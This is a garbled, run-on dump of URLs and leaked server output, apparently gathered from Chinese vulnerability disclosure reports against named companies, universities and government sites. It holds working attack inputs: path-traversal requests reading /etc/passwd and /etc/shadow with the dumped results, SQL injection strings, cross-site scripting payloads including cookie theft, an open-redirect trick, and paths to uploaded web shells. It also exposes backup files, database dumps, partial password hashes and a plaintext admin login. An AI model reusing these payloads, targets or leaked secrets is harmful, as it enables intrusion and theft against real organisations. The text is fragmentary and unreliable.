mail:x:8:12:mail:/var/spool/mail:/sbin/nologin uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin operator:x:11:0:operator:/root:/sbin/nologin games:x:12:100:games:/usr/games:/sbin/nologin gopher:x:13:30:gopher:/var/gopher:/sbin/nologin ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin nobody:x:99:99:Nobody:/:/sbin/nologin dbus:x:81:81:System bus:/:/sbin/nologin usbmuxd:x:113:113:usbmuxd user:/:/sbin/nologin avahi-autoipd:x:170:170:Avahi Stack:/var/lib/avahi-autoipd:/sbin/nologin vcsa:x:69:69:virtual owner:/dev:/sbin/nologin rpc:x:32:32:Rpcbind Daemon:/var/cache/rpcbind:/sbin/nologin rtkit:x:499:497:RealtimeKit:/proc:/sbin/nologin abrt:x:173:173::/etc/abrt:/sbin/nologin haldaemon:x:68:68:HAL daemon:/:/sbin/nologin ntp:x:38:38::/etc/ntp:/sbin/nologin apache:x:48:48:Apache:/var/www:/sbin/nologin saslauth:x:498:496:"Saslauthd saslauth:/sbin/nologin postfix:x:89:89::/var/spool/postfix:/sbin/nologin avahi:x:70:70:Avahi Stack:/var/run/avahi-daemon:/sbin/nologin rpcuser:x:29:29:RPC 
User:/var/lib/nfs:/sbin/nologin nfsnobody:x:65534:65534:Anonymous User:/var/lib/nfs:/sbin/nologin pulse:x:497:495:PulseAudio Daemon:/var/run/pulse:/sbin/nologin gdm:x:42:42::/var/lib/gdm:/sbin/nologin sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin tcpdump:x:72:72::/:/sbin/nologin user:x:500:500:root:/home/user:/bin/bash yyy:x:501:501::/var/www/vhosts:/bin/bash www-data:x:496:490:www-data:/home/www-data:/bin/bash mysql:x:495:489:mysql:/home/mysql:/bin/bash wsf:x:502:502::/var/www/vhosts/horizon.lenovo.com.cn:/bin/bash pinotage:x:503:503::/var/www/vhosts/www.pinotage.me:/bin/bash nagios:x:494:488::/var/spool/nagios:/sbin/nologin http://app.lenovoprinter.cn/admin/login http://api.m.kfc.com.cn/index.php/restaurant/actDetail/ http://stu.wyu.edu.cn/eclub/admin/ http://dept.wyu.edu.cn/wlyl/login.asp http://dept.wyu.edu.cn/jidianxi/gdsyzx/admin_south/ http://job.wyu.edu.cn/scda/picshow.php?act=intopic&aid=3 http://222.75.160.184/login_loginSystem.do,通过工具检测存在strut2命令执行漏洞: http://125.39.193.136/org/login/registerUser.action www.bankofchancheng.com http://czxjgl.czedu.gov.cn/checklogin.asp这个url,有个post的注入 http://czxjgl.czedu.gov.cn/checklogin.asp http://corp.hunantv.com/jobs/在搜索框中输入q% http://act.hunantv.com/cmsapi/job.php处请求json数据。由于是异步传输数据,sqlmap等工具无法识别页面的不同,导致无法注入。 http://act.hunantv.com/cmsapi/job.php处请求json数据。代码如下 http://www.xaepi.gov.cn/shownews.php?id=363 http://www.alijijinhui.org/ http://www.alijijinhui.org/project/?skey=1 http://www.alijijinhui.org的阿里云服务器 http://www.51duide.com/index.php/Trial/trial_content/trial_id/12%27%20and%201=%271 http://gy.haierzmd.com http://gy.haierzmd.com/zclr1.asp?ID=60 http://service2.china.org.cn/question/china_cn/kms/check.php.bak?page=1 http://wap.118114.cn http://wap.118114.cn/bst/star/c.jsp?fr=bst&t=../../../../../../../../etc/passwd 
root:x:0:0:root:/root:/bin/bashbin:x:1:1:bin:/bin:/sbin/nologindaemon:x:2:2:daemon:/sbin:/sbin/nologinadm:x:3:4:adm:/var/adm:/sbin/nologinlp:x:4:7:lp:/var/spool/lpd:/sbin/nologinsync:x:5:0:sync:/sbin:/bin/syncshutdown:x:6:0:shutdown:/sbin:/sbin/shutdownhalt:x:7:0:halt:/sbin:/sbin/haltmail:x:8:12:mail:/var/spool/mail:/sbin/nologinnews:x:9:13:news:/etc/news:/sbin/nologinuucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologinoperator:x:11:0:operator:/root:/sbin/nologingames:x:12:100:games:/usr/games:/sbin/nologingopher:x:13:30:gopher:/var/gopher:/sbin/nologinftp:x:14:50:FTP User:/var/ftp:/sbin/nologinnobody:x:99:99:Nobody:/:/sbin/nologindbus:x:81:81:System bus:/:/sbin/nologinvcsa:x:69:69:virtual owner:/dev:/sbin/nologinrpm:x:37:37::/var/lib/rpm:/sbin/nologinhaldaemon:x:68:68:HAL daemon:/:/sbin/nologinnetdump:x:34:34:Network user:/var/crash:/bin/bashnscd:x:28:28:NSCD Daemon:/:/sbin/nologinsshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologinrpc:x:32:32:Portmapper user:/:/sbin/nologinmailnull:x:47:47::/var/spool/mqueue:/sbin/nologinsmmsp:x:51:51::/var/spool/mqueue:/sbin/nologinrpcuser:x:29:29:RPC User:/var/lib/nfs:/sbin/nologinnfsnobody:x:65534:65534:Anonymous User:/var/lib/nfs:/sbin/nologinpcap:x:77:77::/var/arpwatch:/sbin/nologinapache:x:48:48:Apache:/var/www:/sbin/nologinsquid:x:23:23::/var/spool/squid:/sbin/nologinwebalizer:x:67:67:Webalizer:/var/www/usage:/sbin/nologinxfs:x:43:43:X Server:/etc/X11/fs:/sbin/nologinntp:x:38:38::/etc/ntp:/sbin/nologinpegasus:x:66:65:tog-pegasus services:/var/lib/Pegasus:/sbin/nologinlujingyun:x:0:0::/home/jiangyong:/bin/bashxunjian:x:0:0::/home/xunjian:/bin/bashzhouwen:x:0:0::/home/luwenqiang:/bin/bash http://wap.118114.cn/bst/star/c.jsp?fr=bst&t=../../../../../../../../etc/resolv.conf http://wap.118114.cn/bst/star/c.jsp?fr=bst&t=../../../../../../../../etc/my.cnf view-source:http://live.acfun.tv/1548 http://staticlive.acfun.tv/common/simplayer/playerProductInstall.swf rtmp://vplay.acfun.tv/live rtmp://send.acfun.tv/live 
http://club.sohu.com//more/dahuasohu_cache.php?kindid=664 http://sqlmap.org http://bbs.appchina.com/static/image/common/swfupload.swf www.meihuainfo.com网站配置不当致站点沦陷 http://www.meihuainfo.com/wp-config.php.bak http://bbs.weiqi.tom.com/static/image/common/swfupload.swf?movieName=%22]%29}catch%28e%29{if%28!window.x%29{window.x=1;alert%28/xss/%29}}// http://www.pigai.org/index.php?c=us&a=experience&id=5 http://www.motel168.com/getPromoteCityJson.html?article_Id=31 http://www.jxmtdzj.com/ShowVote.php?id=3 http://www.chinatmg.com http://www.chinatmg.com/chinatmg.rar http://www.chinatmg.com/whir_system/module/ http://www.chinatmg.com/uploadfiles/ http://www.chinatmg.com/sitecn/ http://www.chinatmg.com/sdcm2011102105481/ http://www.chinatmg.com/whir_system/module/security/ http://www.chinatmg.com/whir_system/module/config/upload.aspx http://www.chinatmg.com/whir_system/module/picture/radiopictureselect.aspx http://bbs.letv.com/static/image/common/swfupload.swf http://ul.letv.com/static/image/common/swfupload.swf http://oa.tclking.com http://oa.tclking.com/companycase/CompanyGonggPrint.aspx?documno=S2012084700 http://e.189.cn/getPassword.do http://wwwen.zte.com.cn/WEB-INF/classes/searcher.properties http://www.zteict.com/idcgs.aspx?id=31 http://mobsupport.zte.com.cn/eagent/upload http://jbqgb.jxnews.com.cn/article.php?newsid=1883 http://dev.jxnews.com.cn/yw/ms/view.php?id=11970 http://zqgd.edatahome.com:9090/ACS-server/ACS http://180.169.60.66:7547/cpe http://www.51yunlu.com/install/install.sql http://www.51yunlu.com/php.php http://www.51yunlu.com/admin.php?r=sys/caseindex&keys=123 http://www.51yunlu.com/official.php?r=index/checkCompanyName&clientid=company1&rand=1386745206590&username=e&com_name=e&_=1386745198036 http://daishoudian.tieyou.com/province.html http://bbs.m.qq.com/uc_server/data/config.inc.php http://220.181.153.[马赛克 http://220.181.153.[马赛克]:80/ http://218.62.24.141:8080 http://i.hjsm.tom.com/js/fckeditor//editor/filemanager/connectors/uploadtest.html 
http://express.banggo.com/.svn/entries http://old.homeinns.com/WebService/Order.asmx http://pk.tom.com/web/userChat.do?cmd=deleteSingleMsg&id=1487331&mode=send http://www.51cto.com/o1k2.txt http://os.51cto.com http://network.51cto.com http://netsecurity.51cto.com http://server.51cto.com http://database.51cto.com http://mobile.51cto.com/ http://book.51cto.com/ http://expert.51cto.com/ http://www.wnet.com.cn/member/newadmin/注册后虽然是为审核状态 http://www.wnet.com.cn/member/newadmin/FCKeditor/editor/filemanager/connectors/test.html因为登录后才有操作编辑器的权限。然后上burp截断可上传shell http://my.jcpeixun.com/Account/exchangecoin.aspx?coinnumber=-400000000 http://wap.kuwo.cn/wap/wap/Model?id=11 http://wap.kuwo.cn/wap/wap/Model?id=11 http://wap.kuwo.cn/wap/wap/Series?id=11 http://wap.kuwo.cn/wap/wap/Series?id=11 root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/var/spool/mail:/sbin/nologin news:x:9:13:news:/etc/news uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin operator:x:11:0:operator:/root:/sbin/nologin games:x:12:100:games:/usr/games:/sbin/nologin gopher:x:13:30:gopher:/var/gopher:/sbin/nologin ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin nobody:x:99:99:Nobody:/:/sbin/nologin nscd:x:28:28:NSCD Daemon:/:/sbin/nologin vcsa:x:69:69:virtual owner:/dev:/sbin/nologin pcap:x:77:77::/var/arpwatch:/sbin/nologin rpc:x:32:32:Portmapper user:/:/sbin/nologin mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin ntp:x:38:38::/etc/ntp:/sbin/nologin sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin rpcuser:x:29:29:RPC User:/var/lib/nfs:/sbin/nologin nfsnobody:x:4294967294:4294967294:Anonymous User:/var/lib/nfs:/sbin/nologin dbus:x:81:81:System bus:/:/sbin/nologin avahi:x:70:70:Avahi 
daemon:/:/sbin/nologin haldaemon:x:68:68:HAL daemon:/:/sbin/nologin avahi-autoipd:x:100:101:avahi-autoipd:/var/lib/avahi-autoipd:/sbin/nologin apache:x:48:48:Apache:/var/www:/sbin/nologin oprofile:x:16:16:Special OProfile:/home/oprofile:/sbin/nologin xfs:x:43:43:X Server:/etc/X11/fs:/sbin/nologin sabayon:x:86:86:Sabayon user:/home/sabayon:/sbin/nologin mysql:x:101:104:MySQL server:/var/lib/mysql:/bin/bash http://zzxlrz.hnbys.gov.cn:8182/XLRZ/common/queryNonLogin.action http://www.cqta.gov.cn/test.aspx http://www.cqta.gov.cn/cquinfo/List.aspx?id=106 http://127.0.0.1/startbbs/index.php/user/login http://127.0.0.1/startbbs/index.php/home/getmore/w.jsp http://heilanequestrian.com/account/login.html http://www.tieyou.com/ajax/getGaotieCitysByProvince.html?province=1 http://backyard.csdncms.csdn.net http://www.cs-airport.com/ http://www.qiaopier.com/UserControls/Navtuandetail.aspx?catas=44,93,4,37,104,58,57,106,56,55,16,105 site:http://pt.3g.qq.com/sv?vsid= http://125.93.53.68:8080/console/system/jsp/login.jsp http://active.b2b.hc360.com/HCStory/Search.aspx?id=2 http://maintain.org.hc360.com/maintain/User/login.action jobs.dfem.com.cn/?tag=show_post&part=postshzp&cateid=19&id=22 http://www.dfem.com.cn/?p=admin http://www.chinauib.com/zt/vocational_ny.asp?id=167 http://support.zte.com.cn/support/ind*~1*/.aspx访问,返回 http://support.zte.com.cn/support/ino*~1*/.aspx访问,返回 http://www.dongjiang.gov.cn/aspx.aspx http://www.csmap.gov.cn/iportal/iportalIndex.action http://www.nan-gang.gov.cn/default.aspx http://www.nan-gang.gov.cn/TZFW/NanGangYouShi.aspx?sCode=JCSS http://sn.mail.chinaunicom.cn/owaweb2/ http://help.cnaaa.com/include/dialog/select_soft.php http://help.cnaaa.com/adminsj/login.php http://law.inc.hc360.com/finance/detail.aspx?fund_code=20110408-008 http://law.inc.hc360.com/finance/PrintPage.aspx?fund_id=199494 http://59.151.102.27:8081 http://www.dongfeng-nissan.com.cn/dealer/nissan/zhejiang/wenzhou/wzjhong/news?newstype=NewsType_004 http://v9.demo.phpcms.cn/ 
url:http://v9.demo.phpcms.cn/index.php?c=com_index&m=yp&userid=46%22%20%3E%3Cscript%3Ealert%281%29%3C/script%3E http://www.epweike.com/index.php?do=article&art_cat_id=594&art_id=22664 data:text/html;base64,PHNjcmlwdD5hbGVydCgiS0NGIik8L3NjcmlwdD4= http://www.fecb.com.cn/ http://www.tudou.com/home/vlog/view.do?vlogId=20009261&uname=_334485212 http://openapi.baidu.com/oauth/2.0/authorize?confirm_login=1&response_type=code&redirect_uri=http%3A%2F%2Fpassport.iqiyi.com%2Foauth%2Fcallback.php%3Ffrom%3D1&state=60ecc48c7737bdeaba5d7f499e0392d6&display=page&client_id=VdUQE9922EiS7Qb5N7oFGX8s http://openapi.baidu.com/oauth/2.0/authorize?confirm_login=1&response_type=code&redirect_uri=http%3A%2F%2Fpassport.iqiyi.com%40www.wooyun.org%3Fpassport.iqiyi.com%2F&state=60ecc48c7737bdeaba5d7f499e0392d6&display=page&client_id=VdUQE9922EiS7Qb5N7oFGX8s http://passport.iqiyi.com@www.wooyun.org?passport.iqiyi.com/ http://118.194.34.35/ http://118.194.34.35/validate/over.asp?type=d&providerid=018000005652 http://learn.seeyon.com/login!loginIndexPage.action http://www.tudou.com/home/vlog/_334508420 http://www.tudou.com/home/item/search.do?keyword=%3Cimg+src%3D%23+onerror%3Dalert%281%29%3E&uname=_334485212 http://my.360tiku.com/send_pass.asp http://118.194.34.36:8080/help/ http://www.smeah.gov.cn/pub_index.action http://edit.autohome.com.cn/admin/security/login.aspx http://oa.corpautohome.com Client:2**.1**.3*.30 http://mz.5see.com/ http://usermz.5see.com/ http://203.95.110.97/ http://www.fzgs12366.cn/client/register/initReg.do福州市国家税务局直属税务分局 http://www.zjkxzfw.gov.cn/index/index!list.action http://www.bzxzfw.gov.cn:8080/index/index!list.action http://www.qxzwdt.gov.cn/articleView/articleView!show.action?categoryCode=zxdt&article.id=341987&domainCode=nt http://www.caasc.gov.cn/articleView/articleView!show.action?categoryCode=ckfb&domainCode=nt http://www.ldyx.org/index.php?m=admin&c=index&pc_hash=MvGSp5 http://xiage.yy.com/convert/index.php?a=config&source=d7.2_x1.5 
http://www.heagri.gov.cn/hbagri/more_pic.jsp?siteid=0&lanmu_id=2。 http://211.151.164.53 http://kdeas.kingdee.com/easWebClient/logs/ http://bbs.weiqi.tom.com/utility/convert/index.php?a=config&source=d7.2_x2.0 http://club.eset.com.cn/convert/index.php?a=config&source=d7.2_x2.0 http://122.11.51.232/mysql/ucenter.sql letter.ccidnet.com/phplist-2.10.14.rar http://ccidstudy.ccidnet.com/data/存在遍历 http://www.cofco-property.cn/web.config.bak http://v9.demo.phpcms.cn/index.php?a=lists&areaid=1%22%20onmouseover%3dalert%28/xss/%29%20bad%3d%22&c=index&catid=0&m=yp&modelid=15&page=&price=&tid=1 http://v9.demo.phpcms.cn/index.php?a=lists&areaid=&c=index&catid=0&m=yp&modelid=15&page=&price=&tid=4%22%20onmouseover%3dalert%28/xss/%29%20bad%3d%22 http://v9.demo.phpcms.cn/index.php?a=lists&areaid=&c=index&catid=0&m=yp&modelid=15&page=&price=1%22%20onmouseover%3dalert%28/xss/%29%20bad%3d%22&tid=1 http://mail.dzwww.com www.hebmz.gov.cn http://www.hebmz.gov.cn/next.jsp?ID=06 http://www.hebmz.gov.cn/login.news http://www.dl12333.gov.cn/rcfwzx/rsks/pages/c6i061.aspx http://www.dl12333.gov.cn/_layouts/LssbwebSite/D0101/C6I061/C6I061.aspx?cgcb00=339 http://v.umiwi.com/profile/getCtimeByUid/?uid=1 http://ucenter.zhulang.com/data/avatar/000/17/24/02_avatar_middle.jpg/s.php http://ec.yto.net.cn http://www.gmrbank.com.cn/cpjs/index_1167.aspx?cid=2%20and%20user%3E0 http://www.114mall.cn/home/index.aspx http://hd.chinatax.gov.cn/guoshui/action/InitLocalTax.do?tag=1110000 http://hd.chinatax.gov.cn/guoshui/action/InitLocalTax.do?tag=1210200 http://202.108.90.171/guoshui/action/InitLocalTax.do?tag=2340000 http://hd.chinatax.gov.cn/guoshui/action/InitLocalTax.do?tag=1150000 http://202.108.90.171/guoshui/action/InitLocalTax.do?tag=2340000 http://www.bjsat.gov.cn/guoshui/action/InitLocalTax.do?tag=1110000 http://hd.chinatax.gov.cn/console/login/LoginForm.jsp http://shenpi.yuzhou.gov.cn/OnlineQuery/QueryDetail.aspx?QueryId=635 25555555.com/menpiao/menpiao/MenPiaoList.aspx?key=xx&type=1 
http://antispam.telecom-sh.com/authority/umpass/checkAndSend, ftp://220.249.191.189/ http://docshare.mingdao.com/DocList.aspx?key=%27%20or%20%27%27=%27 http://open.tianya.cn/oauth/authorize.php?oauth_token=e65d28ab0862cbd517c67c3cc6f2247e052ad9c22&oauth_callback=http%3A%2F%2Fm.wbto.cn%3A80%2F%3Fc%3Dm_setting%26m%3Dauth%26b%3Dcallback%26pid%3D24%26aid%3D%26wbto%3D1658628_953c148f2d%26oauth_token%3De65d28ab0862cbd517c67c3cc6f2247e052ad9c22%26oauth_token_secret%3D2fde10390cd1a2477abaa3dcd44e4b99 http://www.dajie.com/vote/vote_detail/3387 http://baike.baidu.com/create/%27%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E%3Cimg%3E%27%27%27%27&enc=gbk http://211.151.164.209/ http://211.151.164.209:80/ http://m.dangdang.com/sms.php?k=f68a138f19F http://www.ubabytv.com.cn/knowledgelist.php?id=1 http://apple.com:/@/www.wooyun.org/ http://en.wooyun.org/bugs/wooyun-2013-014 http://www.ecshop.cn/compare.php?goods[]=14&goods[]=23%22%20onmouseover%3dalert%28/xss/%29%20bad%3d%22&goods[]=32&goods[]=13&goods[]=3&goods[]=7&goods[]=9 http://221.174.24.109:8020/index.action http://www.yooli.com/global/logout.jsp http://www.yooli.com/global/logout.jsp[/img http://www.yooli.com/bbs/posts/list/2679.page http://www.yooli.com/bbs/posts/list/2683.page http://www.yooli.com/bbs/jforum.page?action=insertSave&module=bookmarks&relation_id=2683&relation_type=2&title=B1acken&description=&visible=1 http://www.zjna.gov.cn/ecoi/upload.jsp http://www.zjna.gov.cn/ecoi/lee/upload.action http://www.motel168rates.com/Mains.aspx?city=sh ftp://115.182.51.26/ http://115.182.51.44/phpinfo.php http://115.182.51.144:8000/uploadsys.php.bak http://115.182.51.144:8000/login.php.bak http://61.191.25.187/ http://58.83.219.80 http://58.83.219.80/download http://www.ahchcz.gov.cn:9001/chgzcx/index.action http://pkda.pukou.gov.cn/index.htm南京浦口区档案局 http://m.netcoc.com/www/mlog/user.php?id=82479 http://tjdx.lncom.gov.cn/tjdx/Index.action http://218.58.70.195 http://218.58.70.195/notice/noticeDetail?pk=8796158664513 
http://dzzl.mlr.gov.cn/ http://dzzl.mlr.gov.cn/datagateway/index.action http://218.94.1.157:8000/ http://www.longre.com/Admin/ http://chinaooh.net/index.php?r=cCenter/Public/News&id=128 http://www.bjhdcz.gov.cn:9998/Hotspot/publish.do?opreator=more&city=1 http://www.bjhdcz.gov.cn:9998/Hotspot/publish.do?opreator=more&city=2 http://www.bjhdcz.gov.cn:9998/Hotspot/publish.do?city=1 http://223.202.5.5/ http://vi.iflytek.com/ http://vi.iflytek.com/web-console/ http://vi.iflytek.com/jmx-console/ http://vi.iflytek.com/shell.jsp http://ah2.zhangyue.com/zybook/u/p/user.php?usr=i12656651 http://ah2.zhangyue.com/zybook/u/p/user.php?action=userInfo&usr=i12656651&datatype=json http://research.iflytek.com http://research.iflytek.com/wp-admin/ http://research.iflytek.com/wp-content/themes/twentyeleven/iis.php http://zhiyuan.iflytek.com/ http://zhiyuan.iflytek.com/www.rar http://zhiyuan.iflytek.com/manage/editor/admin/default.php http://zhiyuan.iflytek.com/manage/uploadfile/201312/20131216043106657.php http://www.lenovoprinterclub.com/cases_detail.php?contentid=44 http://lenovoprinterclub.com http://lenovoprinterclub.com/cases_detail.php?contentid=44 http://cjgov.iflytek.com http://cjgov.iflytek.com/ftb.imagegallery.aspx http://m51buy.imxiaomai.com/new_findpwd2.aspx?userphone=用户手机号 http://m51buy.imxiaomai.com/new_regpwd.aspx?usercollege=9&userphone=用户手机号&username=测试 http://www.imxiaomai.com/alterphone2.aspx?phone=11111111111&oldphone=11111111112 http://115.182.9.221/ http://mail.zto.cn/ http://www.tpri.gov.cn/news/html/?95.html http://www.tpri.gov.cn/news/html/?95'.html http://www.tpri.gov.cn/news/html/?95'/**/and/**/'1'='1.html http://topic.xcar.com.cn/201103/fml/lb.php?page=48&t=66&sn_id=3 http://m.webapp.58.com/deleteinfo/信息编号 http://i.webapp.58.com/bj/zufang/信息编号x.shtml?isself=1&&utps=1387022252000","catId":"1|8","browse":"5 http://115.182.9.17 http://115.182.9.17/OpenResultServlet.do?filepath=/etc/passwd http://115.182.9.17/OpenResultServlet.do?filepath=/etc/shadow 
http://www.chnpec.com http://211.80.224.35/PRTVUWeb/pages/status/querystudentinfo.jsp http://xxgk.yantai.gov.cn/list_xxgk/dept_list.jsp?dept=CKJGQ可以盲注 http://zoom.tom.com/images/login_0.jpg/.php http://mts.zte.com.cn http://mts.zte.com.cn/Mtsmap/CustomerLogin.aspx site:www.ahtd.org.cn http://sy.800pai.com/detail.php?tg_id=144 http://api.cbox.cntv.cn/api/column_detail?pid=ukztYUybsWanMQcNKADef2gE9piG4h6d&version=1.0.4&columnid=C10336 tsmzj.gov.cn/Yosef.asp;.txt,通过网站后门可以获得网站管理权限,查看所有文件路径,有编辑,删除,复制文件等权利。网站信息泄露。 http://220.181.10.80/portal/ http://www.kumi.cn/360/xiaoyouxi/game.php?content=20255 http://pic.onlylady.com/files/download.php?file=../../../../../../../../etc/passwd root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/var/spool/mail:/sbin/nologin news:x:9:13:news:/etc/news uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin operator:x:11:0:operator:/root:/sbin/nologin games:x:12:100:games:/usr/games:/sbin/nologin gopher:x:13:30:gopher:/var/gopher:/sbin/nologin ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin nobody:x:99:99:Nobody:/:/sbin/nologin rpc:x:32:32:Portmapper user:/:/sbin/nologin mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin nscd:x:28:28:NSCD Daemon:/:/sbin/nologin vcsa:x:69:69:virtual owner:/dev:/sbin/nologin sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin rpcuser:x:29:29:RPC User:/var/lib/nfs:/sbin/nologin nfsnobody:x:65534:65534:Anonymous User:/var/lib/nfs:/sbin/nologin pcap:x:77:77::/var/arpwatch:/sbin/nologin ntp:x:38:38::/etc/ntp:/sbin/nologin dbus:x:81:81:System bus:/:/sbin/nologin haldaemon:x:68:68:HAL daemon:/:/sbin/nologin avahi:x:70:70:Avahi daemon:/:/sbin/nologin 
avahi-autoipd:x:100:103:avahi-autoipd:/var/lib/avahi-autoipd:/sbin/nologin xfs:x:43:43:X Server:/etc/X11/fs:/sbin/nologin lyb:x:0:0::/home/lyb:/bin/bash yalino:x:0:0::/home/yalino:/bin/bash mysql:x:500:503::/export/home/db/mysql:/bin/bash yushouyang:x:0:0::/home/yushouyang:/bin/bash uuidd:x:101:104:UUID daemon:/var/lib/libuuid:/sbin/nologin http://pic.onlylady.com/files/download.php?file=../../../../../../../../etc/issue http://www.phpstat.net/的分析监测代码时候,其内嵌的JS文件(http://www.phpstat.net/qq/templates/default/default/js/qq.js)会发送后台请求,并获取到用户的QQ号码,详细见截图。 http://www.qhjt.gov.cn http://www.qhjt.gov.cn:10000/qhjt/message/showAll.action http://special.bydauto.com.cn http://special.bydauto.com.cn/special/f3rhd2/show.php?id=1306 http://www.igocctv.com,据说是“中央电视台唯一的电视购物官方网站”! xxxxxx2FRNnRk1:15580:0:99999:7 mxxxxxx0vpsaeMOiJaHfHw1:15952:0:99999:7 encap:Ethernet A4:BA:DB:42:68:09 addr:192.168.195.17 Bcast:192.168.195.255 Mask:255.255.255.0 a6ba:dbff:fe42:6809/64 Scope:Link MTU:1500 packets:6869089290 packets:5390431831 txqueuelen:1000 http://duoshuo.com/features/?feature_id=1 http://58.215.167.50/index.asp http://www.wanda.cn/api.php?op=feedback& http://lbs.189.cn/wwwroot.rar http://wq.tom.com/images/swfupload/swfupload.swf文件对movieName参数过滤不严格,存在flash http://wiki.ops.cctv.com/dashboard.action http://viptv.pptv.com/activity/yearvipfree http://bureau.cctv.com/default.php http://bureau.cctv.com/ziliaoku.php?z_id=113 http://zhandian.cctv.com zhandian.cctv.com/webs.php?id=20 user:readonly_v2@% http://www.anjuke.com/ajax/qa/ http://www.cctvdream.com.cn/about.php?id=9 http://wooyun.org/bugs/wooyun-2010-011296 http://www.xzdzj.gov.cn:8008/1.txt http://www.zjyh.gov.cn/start.action www.cbi.gov.cn:8080/wiseroot/content_xicon/121235.xls www.cbi.gov.cn右边登录还真进去了。 http://115.182.35.80/login.jsp http://vdn.apps.cntv.cn/api/getVideoInfoForCBox http://www.xiaolan.gov.cn/bm/news.php?id=162 http://health.yonyou.com/admin/FCKeditor/editor/filemanager/upload/php/upload.php 
http://health.yonyou.com/admin/FCKeditor/editor/filemanager/upload/php/upload.php?Type=Media http://城市名字的拼音(如:changsha).kingdee.com:80/ http://feedback.chinanews.com/ci/ http://feedback.chinanews.com/ci/database_bak/ http://feedback.chinanews.com/ci/database_bak/feedback_2012_10_10.sql http://feedback.chinanews.com/ci/index.php http://member.aili.com/ http://space.aili.com/uc_server/data/avatar/001/09/46/14_avatar_big.jpg?random=3387 http://golf.cctv.com/court1209/court.php?do=terminal&domain=list&type=1&id=319 http://xm.zskjj.gov.cn/redirect.action jdbc:oracle:thin:@localhost:1521:ZSK打码 http://www.360qc.com/main/channel_tofront.action?parentId=361 http://www.360qc.com/main/channel_tofront.action?parentId=346 http://www.360qc.com/main/channel_tofront.action?parentId=747 http://www.360qc.com/main/channel_tofront.action?parentId=756 http://jwc.nau.edu.cn/ http://jwc.nau.edu.cn:80/ http://www.bjbskj.com/newsdetails.asp?id=468 http://www.bjbskj.com/newsdetails.asp?id=468 http://www.bjbskj.com/admin/login.asp http://www.bjbskj.com/admin/w78eWebEditor/asp/upload.asp?action=save&type=image&style=popup&cusdir=d.asp http://www.wandaplazas.com/ http://www.wandaplazas.com/api.php?op=feedback& http://www.zhongfuti.com/Trade/Dlt/Project_Info.html?id=103233 http://sports.titan24.com/qipai/app/zhuanti/index.php?cid=916 http://sugar.jiankongbao.com/index.php?module=Home&action=index http://hr.bjd.com.cn http://event.youku.com/siemens-home/openthekitchen2013/save.php?action=videourl&id=2 http://sd.189.cn(山东站) http://sso.pengpeng.com/register-v2 http://127.0.0.1/easethink/message.php?act= http://127.0.0.1/easethink/link.php?act=go&city=fujian&url= http://www.kumi.cn/qq/xue/player.php?id=32371 http://zixun.kumi.cn http://passport.zjrc.com/Jobs/Search http://passport.zjrc.com/Jobs/Search?js_keytype=1&js_key=%E9%98% http://passport.zjrc.com/Jobs/Search?js_keytype=后边当然是我的cookies接收地址了。这个时候就用到了贵站的论坛里了。 http://club.zjrc.com/forumindex.aspx http://club.zjrc.com/usercpprofile.aspx 
http://waibao.sogou-inc.com/ http://eps.edong.com http://eps.edong.com/admin/kickback/custdetail.php?member_id=21853 http://bbs.21cn.com/ http://s.wanda.cn/万达商户平台登录密码可以重置。……………………OMG http://www.kumi.cn/ysweb/xue/player.php?id=32371 http://www.kumi.cn/360/xue/player.php?id=26013 http://www.kumi.cn/360/xue/player.php?id=26013 http://www.kumi.cn/ysweb/xue/player.php?id=32371 http://121.52.220.27/news_detail.php?articleId=25 http://hbtc.cnhubei.com/Search.aspx?key=11%u90095 http://360kan.union.tudou.com/kan/play?md5=11e08af9e16f8a31&site=tudou&title=%E7%AB%A0%E5%AD%90%E6%80%A1%22%E9%99%AA%E7%9D%A1%E6%A1%88%22%E5%AE%98%E5%8F%B8%E8%8E%B7%E8%83%9C+%E8%A2%AB%E5%91%8A%E5%A4%96%E5%AA%92%E5%8F%91%E9%81%93%E6%AD%89%E5%A3%B0%E6%98%8E&url=http%3A%2F%2Fwww.tudou.com%2Flistplay%2F6VJzjS-aQrI%2FsgXrngp_GDQ.html&tag=%E7%AB%A0%E5%AD%90%E6%80%A1&category=1&cover=http%3A%2F%2Fp1.qhimg.com%2Ft0161f87a62d2f3ad7c.jpg&duration=71&vtab=yule&km=11e08af9e16f8a31&s=4ff4d9d77698da6de6f90a152cc7a209&usetab=none&qq-pf-to=pcqq.group http://game.gfan.com/ http://click.21cn.com/ user:admin pwd:21cn http://tcl.iqiyi.com/ http://tcl.iqiyi.com/upload/1387351273535.jpg/.php http://www.xd.com/zhaopin?id=449&category=%E6%8A%80%E6%9C%AF%E7%A0%94%E5%8F%91%E7%B1%BB&title=PHP%E8%BD%AF%E4%BB%B6%E5%BC%80%E5%8F%91%E5%B7%A5%E7%A8%8B%E5%B8%88 www.xd.com http://www.xd.com 